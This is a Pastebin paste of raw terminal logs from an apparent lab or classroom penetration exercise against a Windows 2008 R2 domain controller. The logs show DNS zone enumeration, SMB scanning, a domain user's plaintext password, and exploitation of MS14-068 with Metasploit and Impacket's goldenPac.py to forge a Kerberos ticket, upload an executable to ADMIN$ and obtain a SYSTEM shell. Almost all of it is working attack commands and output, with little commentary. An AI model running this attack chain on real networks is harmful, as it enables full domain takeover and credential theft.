API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 9th, 2018
178
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.30 KB | None | 0 0
raw download clone embed print report
  1. jvh@jvh-E403SA:~$ cat Desktop/testingformerica
  2. C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
  3. type dns.contoso-west.org
  4. > ls -d contoso-west.org
  5.  
  6. ...
  7. [dc2008r2-group1.contoso-west.org]
  8. dc2008r2-group1 A 10.0.0.149
  9. dcslave2008-group1 A 10.0.0.148
  10. DomainDnsZones A 10.0.0.149
  11. ...
  12.  
  13.  
  14. msf auxiliary(smb_version) > set RHOSTS 10.0.0.149
  15. RHOSTS => 10.0.0.149
  16. msf auxiliary(smb_version) > run
  17.  
  18. [+] 10.0.0.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:DC2008R2-GROUP1) (domain:CONTOSO-WEST)
  19. [*] Scanned 1 of 1 hosts (100% complete)
  20. [*] Auxiliary module execution completed
  21.  
  22.  
  23. proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
  24. ProxyChains-3.1 (http://proxychains.sf.net)
  25. Enter blot's password: Bl0tt12309-
  26. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  27. Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
  28. net rpc> user
  29. net rpc user> show
  30. Usage: net rpc user show <username>
  31. net rpc user show failed: NT_STATUS_INVALID_PARAMETER
  32. net rpc user> show blot
  33. user rid: 1109, group rid: 513
  34. net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
  35.  
  36.  
  37. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  38.  
  39.  
  40. msf auxiliary(ms14_068_kerberos_checksum) > show info
  41.  
  42. Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
  43. Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  44. License: Metasploit Framework License (BSD)
  45. Rank: Normal
  46. Disclosed: 2014-11-18
  47.  
  48. Provided by:
  49. Tom Maddock
  50. Sylvain Monne
  51. juan vazquez <juan.vazquez@metasploit.com>
  52.  
  53. Basic options:
  54. Name Current Setting Required Description
  55. ---- --------------- -------- -----------
  56. DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
  57. PASSWORD yes The Domain User password
  58. RHOST yes The target address
  59. RPORT 88 yes The target port
  60. Timeout 10 yes The TCP timeout to establish connection and read data
  61. USER yes The Domain User
  62. USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  63.  
  64. Description:
  65. This module exploits a vulnerability in the Microsoft Kerberos
  66. implementation. The problem exists in the verification of the
  67. Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  68. where a domain user may forge a PAC with arbitrary privileges,
  69. including Domain Administrator. This module requests a TGT ticket
  70. with a forged PAC and exports it to a MIT Kerberos Credential Cache
  71. file. It can be loaded on Windows systems with the Mimikatz help. It
  72. has been tested successfully on Windows 2008.
  73.  
  74. References:
  75. https://cvedetails.com/cve/CVE-2014-6324/
  76. https://technet.microsoft.com/en-us/library/security/MS14-068
  77. OSVDB (114751)
  78. http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  79. https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  80. https://github.com/bidord/pykek
  81. https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
  82.  
  83.  
  84.  
  85. msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
  86. DOMAIN => CONTOSO-WEST
  87. msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
  88. RHOST => 10.0.0.149
  89. msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
  90. USER => blot
  91. msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
  92. user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
  93. msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
  94. msf auxiliary(ms14_068_kerberos_checksum) > show options
  95.  
  96. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  97.  
  98. Name Current Setting Required Description
  99. ---- --------------- -------- -----------
  100. DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
  101. PASSWORD Bl0tt12309- yes The Domain User password
  102. RHOST 10.0.0.149 yes The target address
  103. RPORT 88 yes The target port
  104. Timeout 10 yes The TCP timeout to establish connection and read data
  105. USER blot yes The Domain User
  106. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  107.  
  108.  
  109. msf auxiliary(ms14_068_kerberos_checksum) > run
  110.  
  111. [*] Validating options...
  112. [*] Using domain CONTOSO-WEST.ORG...
  113. [*] 10.0.0.149:88 - Sending AS-REQ...
  114. [*] 10.0.0.149:88 - Parsing AS-REP...
  115. [*] 10.0.0.149:88 - Sending TGS-REQ...
  116. [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
  117. [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  118. [*] Auxiliary module execution completed
  119.  
  120. root@10-kali2-group10:~/.msf4/loot# ls
  121. 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
  122. 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
  123. 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
  124. 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  125. root@10-kali2-group10:~/.msf4/loot#
  126.  
  127.  
  128. To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets
  129.  
  130. root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
  131.  
  132.  
  133.  
  134.  
  135. Modified the nano /etc/krb5.conf
  136. added: [realms]
  137. CONTOSO-WEST.ORG = {
  138. kdc = dc2008r2-group1
  139. admin_server = dc2008r2-group1
  140. default_domain = CONTOSO-WEST
  141. }
  142. [domain_realm]
  143. .contoso-west = CONTOSO-WEST.org
  144. contoso-west = CONTOSO-WEST.org
  145.  
  146.  
  147. proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
  148. ProxyChains-3.1 (http://proxychains.sf.net)
  149. Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
  150.  
  151. Password:Bl0tt12309-
  152. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  153. [*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
  154. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  155. |DNS-request| contoso-west.org
  156. |S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
  157. |DNS-response|: contoso-west.org does not exist
  158. [-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
  159. [*] Attacking domain controller 10.0.0.149
  160. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  161. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  162. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  163. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  164. [*] 10.0.0.149 found vulnerable!
  165. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  166. [*] Requesting shares on 10.0.0.149.....
  167. [*] Found writable share ADMIN$
  168. [*] Uploading file UApVHfro.exe
  169. [*] Opening SVCManager on 10.0.0.149.....
  170. [*] Creating service TGOJ on 10.0.0.149.....
  171. [*] Starting service TGOJ.....
  172. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  173. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  174. [!] Press help for extra shell commands
  175. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  176. Microsoft Windows [Version 6.1.7601]
  177. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  178.  
  179. C:\Windows\system32>ipconfig
  180.  
  181. Windows IP Configuration
  182.  
  183.  
  184. Ethernet adapter Local Area Connection:
  185.  
  186. Connection-specific DNS Suffix . :
  187. IPv4 Address. . . . . . . . . . . : 10.0.0.149
  188. Subnet Mask . . . . . . . . . . . : 255.255.255.240
  189. Default Gateway . . . . . . . . . : 10.0.0.145
  190.  
  191. Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:
  192.  
  193. Media State . . . . . . . . . . . : Media disconnected
  194. Connection-specific DNS Suffix . :
  195.  
  196. C:\Windows\system32>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!